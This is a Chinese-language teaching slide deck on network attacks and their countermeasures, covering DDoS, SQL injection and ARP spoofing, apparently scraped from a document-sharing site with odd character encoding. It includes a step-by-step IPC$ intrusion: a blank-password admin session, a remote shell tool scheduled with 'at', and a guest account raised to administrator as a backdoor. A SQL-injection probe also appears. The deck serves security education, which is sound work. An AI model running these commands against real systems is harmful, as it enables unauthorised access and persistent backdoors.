版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
網(wǎng)絡(luò)攻擊的常見手段
與防范措施01什么是網(wǎng)絡(luò)安全?02網(wǎng)絡(luò)安全的主要特性目錄一、計(jì)算機(jī)網(wǎng)絡(luò)安全的概念什么是網(wǎng)絡(luò)安全?網(wǎng)絡(luò)安全:網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù),不因偶然的或者惡意的原因而遭受到破壞、更改、泄露,系統(tǒng)連續(xù)可靠正常地運(yùn)行,網(wǎng)絡(luò)服務(wù)不中斷。網(wǎng)絡(luò)安全的主要特性保密性信息不泄露給非授權(quán)用戶、實(shí)體或過程,或供其利用的特性。完整性數(shù)據(jù)未經(jīng)授權(quán)不能進(jìn)行改變的特性。即信息在存儲或傳輸過程中保持不被修改、不被破壞和丟失的特性??捎眯钥杀皇跈?quán)實(shí)體訪問并按需求使用的特性。即當(dāng)需要時(shí)能否存取所需的信息。例如網(wǎng)絡(luò)環(huán)境下拒絕服務(wù)、破壞網(wǎng)絡(luò)和有關(guān)系統(tǒng)的正常運(yùn)行等都屬于對可用性的攻擊;可控性對信息的傳播及內(nèi)容具有控制能力。可審查性出現(xiàn)安全問題時(shí)提供依據(jù)與手段01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄二、常見的網(wǎng)絡(luò)攻擊黑客黑客是程序員,掌握操作系統(tǒng)和編程語言方面的知識,樂于探索可編程系統(tǒng)的細(xì)節(jié),并且不斷提高自身能力,知道系統(tǒng)中的漏洞及其原因所在。專業(yè)黑客都是很有才華的源代碼創(chuàng)作者。起源:20世紀(jì)60年代目的:基于興趣非法入侵基于利益非法入侵信息戰(zhàn)KevinMitnick凱文?米特尼克是世界上最著名的黑客之一,第一個(gè)被美國聯(lián)邦調(diào)查局通緝的黑客。1979年,15歲的米特尼克和他的朋友侵入了北美空中防務(wù)指揮系統(tǒng)。莫里斯蠕蟲(MorrisWorm)
時(shí)間1988年肇事者羅伯特·塔潘·莫里斯,美國康奈爾大學(xué)學(xué)生,其父是美國國家安全局安全專家機(jī)理利用sendmail,finger等服務(wù)的漏洞,消耗CPU資源,拒絕服務(wù)影響Internet上大約6000臺計(jì)算機(jī)感染,占當(dāng)時(shí)Internet聯(lián)網(wǎng)主機(jī)總數(shù)的10%,造成9600萬美元的損失黑客從此真正變黑,黑客倫理失去約束,黑客傳統(tǒng)開始中斷。2001年中美黑客大戰(zhàn)事件背景和經(jīng)過中美軍機(jī)南海4.1撞機(jī)事件為導(dǎo)火線4月初,以PoizonB0x、pr0phet為代表的美國黑客組織對國內(nèi)站點(diǎn)進(jìn)行攻擊,約300個(gè)左右的站點(diǎn)頁面被修改4月下旬,國內(nèi)紅(黑)客組織或個(gè)人,開始對美國網(wǎng)站進(jìn)行小規(guī)模的攻擊行動(dòng),4月26日有人發(fā)表了“五一衛(wèi)國網(wǎng)戰(zhàn)”戰(zhàn)前聲明,宣布將在5月1日至8日,對美國網(wǎng)站進(jìn)行大規(guī)模的攻擊行動(dòng)。各方都得到第三方支援各大媒體紛紛報(bào)道,評論,中旬結(jié)束大戰(zhàn)PoizonB0x、pr0phet更改的網(wǎng)頁中經(jīng)網(wǎng)數(shù)據(jù)有限公司中國科學(xué)院心理研究所國內(nèi)某政府網(wǎng)站國內(nèi)某大型商業(yè)網(wǎng)站國內(nèi)黑客組織更改的網(wǎng)站頁面美國勞工部網(wǎng)站美國某節(jié)點(diǎn)網(wǎng)站美國某大型商業(yè)網(wǎng)站美國某政府網(wǎng)站這次事件中采用的常用攻擊手法紅客聯(lián)盟負(fù)責(zé)人在5月9日網(wǎng)上記者新聞發(fā)布會上對此次攻擊事件的技術(shù)背景說明如下:“我們更多的是一種不滿情緒的發(fā)泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系統(tǒng),這個(gè)行動(dòng)在技術(shù)上是沒有任何炫耀和炒作的價(jià)值的。”主要采用當(dāng)時(shí)流行的系統(tǒng)漏洞進(jìn)行攻擊這次事件中被利用的典型漏洞用戶名泄漏,缺省安裝的系統(tǒng)用戶名和密碼Unicode編碼可穿越firewall,執(zhí)行黑客指令A(yù)SP源代碼泄露可遠(yuǎn)程連接的數(shù)據(jù)庫用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗(yàn)證機(jī)制可被繞過Bind遠(yuǎn)程溢出,Lion蠕蟲SUNrpc.sadmind遠(yuǎn)程溢出,sadmin/IIS蠕蟲Wu-Ftpd格式字符串錯(cuò)誤遠(yuǎn)程安全漏洞拒絕服務(wù)(syn-flood,ping)19801985199019952000密碼猜測可自動(dòng)復(fù)制的代碼密碼破解利用已知的漏洞破壞審計(jì)系統(tǒng)后門會話劫持擦除痕跡嗅探包欺騙GUI遠(yuǎn)程控制自動(dòng)探測掃描拒絕服務(wù)www攻擊工具攻擊者入侵者水平攻擊手法半開放隱蔽掃描控制臺入侵檢測網(wǎng)絡(luò)管理DDOS攻擊2002高入侵技術(shù)的發(fā)展01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄常見的攻擊方法端口掃描:網(wǎng)絡(luò)攻擊的前奏網(wǎng)絡(luò)監(jiān)聽:局域網(wǎng)、HUB、ARP欺騙、網(wǎng)關(guān)設(shè)備郵件攻擊:郵件炸彈、郵件欺騙網(wǎng)頁欺騙:偽造網(wǎng)址、DNS重定向密碼破解:字典破解、暴力破解、md5解密漏洞攻擊:溢出攻擊、系統(tǒng)漏洞利用種植木馬:隱蔽、免殺、網(wǎng)站掛馬、郵件掛馬DoS、DDoS:拒絕服務(wù)攻擊、分布式拒絕服務(wù)攻擊cc攻擊:借助大量代理或肉雞訪問最耗資源的網(wǎng)頁XSS跨站攻擊、SQL注入:利用變量檢查不嚴(yán)格構(gòu)造javascript語句掛馬或獲取用戶信息,或構(gòu)造sql語句猜測表、字段以及管理員賬號密碼社會工程學(xué):QQ數(shù)據(jù)庫被盜端口判斷判斷系統(tǒng)選擇最簡方式入侵分析可能有漏洞的服務(wù)獲取系統(tǒng)一定權(quán)限提升為最高權(quán)限安裝多個(gè)系統(tǒng)后門清除入侵腳印攻擊其他系統(tǒng)獲取敏感信息作為其他用途常見的系統(tǒng)入侵步驟IP地址、主機(jī)是否運(yùn)行、到要入侵點(diǎn)的路由、主機(jī)操作系統(tǒng)與用戶信息等。攻擊步驟1.收集主機(jī)信息
Ping命令判斷計(jì)算機(jī)是否開著,或者數(shù)據(jù)包發(fā)送到返回需要多少時(shí)間
Tracert/Tracerout命令跟蹤從一臺計(jì)算機(jī)到另外一臺計(jì)算機(jī)所走的路徑
Finger和Rusers命令收集用戶信息
Host或者Nslookup命令,結(jié)合Whois和Finger命令獲取主機(jī)、操作系統(tǒng)和用戶等信息應(yīng)用的方法:獲取網(wǎng)絡(luò)服務(wù)的端口作為入侵通道。2.端口掃描1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達(dá)掃瞄 7種掃瞄類型:3、系統(tǒng)漏洞利用
一次利用ipc$的入侵過程1.C:\>netuse\\x.x.x.x\IPC$“”/user:“admintitrator”
用“流光”掃的用戶名是administrator,密碼為“空”的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下3.C:\>nettime\\x.x.x.x
查查時(shí)間,發(fā)現(xiàn)x.x.x.x的當(dāng)前時(shí)間是2003/3/19上午11:00,命令成功完成。4.C:\>at\\x.x.x.x11:05srv.exe
用at命令啟動(dòng)srv.exe吧(這里設(shè)置的時(shí)間要比主機(jī)時(shí)間推后)5.C:\>nettime\\x.x.x.x
再查查時(shí)間到了沒有,如果x.x.x.x的當(dāng)前時(shí)間是2003/3/19上午11:05,那就準(zhǔn)備開始下面的命令。6.C:\>telnetx.x.x.x99
這里會用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個(gè)Telnet服務(wù)!這就要用到ntlm了7.C:\>copyntlm.exe\\\admin$
ntlm.exe也在《流光》的Tools目錄中
8.C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)(這里的C:\WINNT\system32>是在對方計(jì)算機(jī)上運(yùn)行當(dāng)出現(xiàn)“DONE”的時(shí)候,就說明已經(jīng)啟動(dòng)正常。然后使用“netstarttelnet”來開啟Telnet服務(wù))9.Telnetx.x.x.x,接著輸入用戶名與密碼就進(jìn)入對方了10.C:\>netuserguest/active:yes
為了方便日后登陸,將guest激活并加到管理組11.C:\>netuserguest1234
將Guest的密碼改為123412.C:\>netlocalgroupadministratorsguest/add
將Guest變?yōu)锳dministrator01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄北京時(shí)間10月22日凌晨,美國域名服務(wù)器管理服務(wù)供應(yīng)商Dyn宣布,該公司在當(dāng)?shù)貢r(shí)間周五早上遭遇了DDoS(分布式拒絕服務(wù))攻擊,從而導(dǎo)致許多網(wǎng)站在美國東海岸地區(qū)宕機(jī),Twitter、Tumblr、Netflix、亞馬遜、Shopify、Reddit、Airbnb、PayPal和Yelp等諸多人氣網(wǎng)站無一幸免。Dyn稱,攻擊由感染惡意代碼的設(shè)備發(fā)起,來自全球上千萬IP地址,幾百萬惡意攻擊的源頭是物聯(lián)網(wǎng)聯(lián)系的所謂“智能”家居產(chǎn)品。1、DDoS(分布式拒絕服務(wù))攻擊攻擊現(xiàn)象被攻擊主機(jī)上有大量等待的TCP連接;網(wǎng)絡(luò)中充斥著大量的無用的數(shù)據(jù)包;源地址為假制造高流量無用數(shù)據(jù),造成網(wǎng)絡(luò)擁塞,使受害主機(jī)無法正常和外界通訊;利用受害主機(jī)提供的傳輸協(xié)議上的缺陷反復(fù)高速的發(fā)出特定的服務(wù)請求,使主機(jī)無法處理所有正常請求;嚴(yán)重時(shí)會造成系統(tǒng)死機(jī)。分布式拒絕服務(wù)攻擊:借助于C/S(客戶/服務(wù)器)技術(shù),將多個(gè)計(jì)算機(jī)聯(lián)合起來作為攻擊平臺,對一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DDoS攻擊,從而成倍地提高拒絕服務(wù)攻擊的威力分布式拒絕服務(wù)攻擊攻擊流程1、搜集資料,被攻擊目標(biāo)主機(jī)數(shù)目、地址情況,目標(biāo)主機(jī)的配置、性能,目標(biāo)的寬帶。2、是占領(lǐng)和控制網(wǎng)絡(luò)狀態(tài)好、性能好、安全管理水平差的主機(jī)做傀儡機(jī)。3、攻擊者在客戶端通過telnet之類的常用連接軟件,向主控端發(fā)送發(fā)送對目標(biāo)主機(jī)的攻擊請求命令。主控端偵聽接收攻擊命令,并把攻擊命令傳到分布端,分布端是執(zhí)行攻擊的角色,收到命令立即發(fā)起flood攻擊。
主機(jī)設(shè)置所有的主機(jī)平臺都有抵御DoS的設(shè)置,基本的有:1、關(guān)閉不必要的服務(wù)2、限制同時(shí)打開的Syn半連接數(shù)目3、縮短Syn半連接的timeout時(shí)間4、及時(shí)更新系統(tǒng)補(bǔ)丁網(wǎng)絡(luò)設(shè)置1.防火墻禁止對主機(jī)的非開放服務(wù)的訪問限制同時(shí)打開的SYN最大連接數(shù)限制特定IP地址的訪問啟用防火墻的防DDoS的屬性嚴(yán)格限制對外開放的服務(wù)器的向外訪問第五項(xiàng)主要是防止自己的服務(wù)器被當(dāng)做工具去害人。2.路由器設(shè)置SYN數(shù)據(jù)包流量速率升級版本過低的ISO為路由器建立logserver防范措施雅虎作為美國著名的互聯(lián)網(wǎng)門戶網(wǎng)站,也是20世紀(jì)末互聯(lián)網(wǎng)奇跡的創(chuàng)造者之一。然而在2013年8月20日,中國雅虎郵箱宣布停止提供服務(wù)。就在大家已快將其淡忘的時(shí)候,雅虎公司突然對外發(fā)布消息,承認(rèn)在2014年的一次黑客襲擊中,至少5億用戶的數(shù)據(jù)信息遭竊。此次事件成為了有史以來規(guī)模最大的單一網(wǎng)站信息泄露事件。2、SQL注入攻擊攻擊方法SQL注入主要是由于網(wǎng)頁制作者對輸入數(shù)據(jù)檢查不嚴(yán)格,攻擊者通過對輸入數(shù)據(jù)的改編來實(shí)現(xiàn)對數(shù)據(jù)庫的訪問,從而猜測出管理員賬號和密碼;如/view.asp?id=1;改為/view.asp?id=1anduser=‘a(chǎn)dmin’;如果頁面顯示正常,說明數(shù)據(jù)庫表中有一個(gè)user字段,且其中有admin這個(gè)值;通過SQL注入攻擊可以探測網(wǎng)站后臺管理員賬號和密碼。SQL注入:就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來說,它是利用現(xiàn)有應(yīng)用程序,將(惡意)的SQL命令注入到后臺數(shù)據(jù)庫引擎執(zhí)行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫,而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語句。利用探測出的管理員賬號和密碼登陸網(wǎng)站后臺,在擁有附件上傳的功能模塊中嘗試上傳網(wǎng)頁木馬或一句話木馬(一般利用數(shù)據(jù)庫備份和恢復(fù)功能);通過網(wǎng)頁木馬探測IIS服務(wù)器配置漏洞,找到突破點(diǎn)提升權(quán)限,上傳文件木馬并在遠(yuǎn)程服務(wù)器上運(yùn)行;通過連接木馬徹底拿到系統(tǒng)控制權(quán);因此,SQL注入只是網(wǎng)站入侵的前奏,就算注入成功也不一定可以拿到webshell或root。1、輸入驗(yàn)證檢查用戶輸入的合法性,確信輸入的內(nèi)容只包含合法的數(shù)據(jù)。2、錯(cuò)誤消息處理防范SQL注入,還要避免出現(xiàn)一些詳細(xì)的錯(cuò)誤消息,因?yàn)楹诳蛡兛梢岳眠@些消息。要使用一種標(biāo)準(zhǔn)的輸入確認(rèn)機(jī)制來驗(yàn)證所有的輸入數(shù)據(jù)的長度、類型、語句、企業(yè)規(guī)則等。3、加密處理將用戶登錄名稱、密碼等數(shù)據(jù)加密保存。4、存儲過程來執(zhí)行所有的查詢SQL參數(shù)的傳遞方式將防止攻擊者利用單引號和連字符實(shí)施攻擊。此外,它還使得數(shù)據(jù)庫權(quán)限可以限制到只允許特定的存儲過程執(zhí)行,所有的用戶輸入必須遵從被調(diào)用的存儲過程的安全上下文,這樣就很難再發(fā)生注入式攻擊了。5、使用專業(yè)的漏洞掃描工具6、確保數(shù)據(jù)庫安全7、安全審評防范措施3、ARP攻擊ARP(AddressResolutionProtocol,地址解析協(xié)議)是根據(jù)IP地址獲取物理地址的一個(gè)TCP/IP協(xié)議。ARP攻擊就是通過偽造IP地址和MAC地址實(shí)現(xiàn)ARP欺騙,能夠在網(wǎng)絡(luò)中產(chǎn)生大量的ARP通信量使網(wǎng)絡(luò)阻塞,攻擊者只要持續(xù)不斷的發(fā)出偽造的ARP響應(yīng)包就能更改目標(biāo)主機(jī)ARP緩存中的IP-MAC條目,造成網(wǎng)絡(luò)中斷或中間人攻擊。ARP攻擊僅能在局域網(wǎng)內(nèi)進(jìn)行。ARP請求包是以廣播的形式發(fā)出,正常情況下只有正確IP地址的主機(jī)才會發(fā)出ARP響應(yīng)包,告知查詢主機(jī)自己的MAC地址。局域網(wǎng)中每臺主機(jī)都維護(hù)著一張ARP表,其中存放著<IP—MAC>地址對。ARP改向的中間人竊聽A發(fā)往B:(MACb,MACa,PROTOCOL,DATA)B發(fā)往A:(MACa,MACb,PROTOCOL,DATA)A發(fā)往B:(MACx,MACa,PROTOCOL,DATA)B發(fā)往A:(MACx,MACb,PROTOCOL,DATA)原理:X分別向A和B發(fā)送ARP包,促使其修改ARP表主機(jī)A的ARP表中B為<IPb—MACx>主機(jī)B的ARP表中A為<IPa—MACx>X成為主機(jī)A和主機(jī)B之間的“中間人”,可以選擇被動(dòng)地監(jiān)測流量,獲取密碼和其他涉密信息,也可以偽造數(shù)據(jù),改變電腦A和電腦B之間的通信內(nèi)容。防范措施:網(wǎng)關(guān)和終端雙向綁定IP和MAC地址。局域網(wǎng)中的每臺電腦中進(jìn)行靜態(tài)ARP綁定。打開安全防護(hù)軟件的ARP防火墻功能。徹底追蹤查殺ARP病毒。01常見的
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- PLC控制技術(shù)考試模擬題(含答案)
- 養(yǎng)老院環(huán)境保護(hù)管理制度
- 交通安全教育課件
- 《打造學(xué)習(xí)型團(tuán)隊(duì)》課件
- 2024年新能源項(xiàng)目投資委托居間合同范本3篇
- 教育合同范本
- 2024年度特殊工種委托招聘與職業(yè)安全防護(hù)用品供應(yīng)合同3篇
- 臨床靜脈留置針護(hù)理及并發(fā)癥
- 2024年度綠色有機(jī)食材供應(yīng)合作協(xié)議2篇
- 2024天津出租車租賃車輛安全性能檢測合同3篇
- 主動(dòng)脈瓣關(guān)閉不全
- 2024國家開放大學(xué)《企業(yè)信息管理》形成性考核1-4答案
- 民辦學(xué)校競業(yè)限制合同文本
- 六年級下冊心理健康教案-第三十三課 有你有我真溫暖|北師大版
- 第15課 我們不亂扔 一年級道德與法治上冊(2024版)教學(xué)設(shè)計(jì)
- 2024新信息科技四年級《第三單元 有趣的編碼應(yīng)用》大單元整體教學(xué)設(shè)計(jì)
- 中國集中式光伏電站行業(yè)發(fā)展策略、市場環(huán)境及前景研究分析報(bào)告
- 《ISO 55013-2024 資產(chǎn)管理-數(shù)據(jù)資產(chǎn)管理指南》解讀和實(shí)施指導(dǎo)材料(雷澤佳編制-2024)
- GB/T 18314-2024全球?qū)Ш叫l(wèi)星系統(tǒng)(GNSS)測量規(guī)范
- 溺水的預(yù)防與急救 課件 2024-2025學(xué)年人教版(2024)初中體育與健康七年級全一冊
- “搶10”游戲(教學(xué)設(shè)計(jì))-2024-2025學(xué)年一年級上冊數(shù)學(xué)蘇教版
評論
0/150
提交評論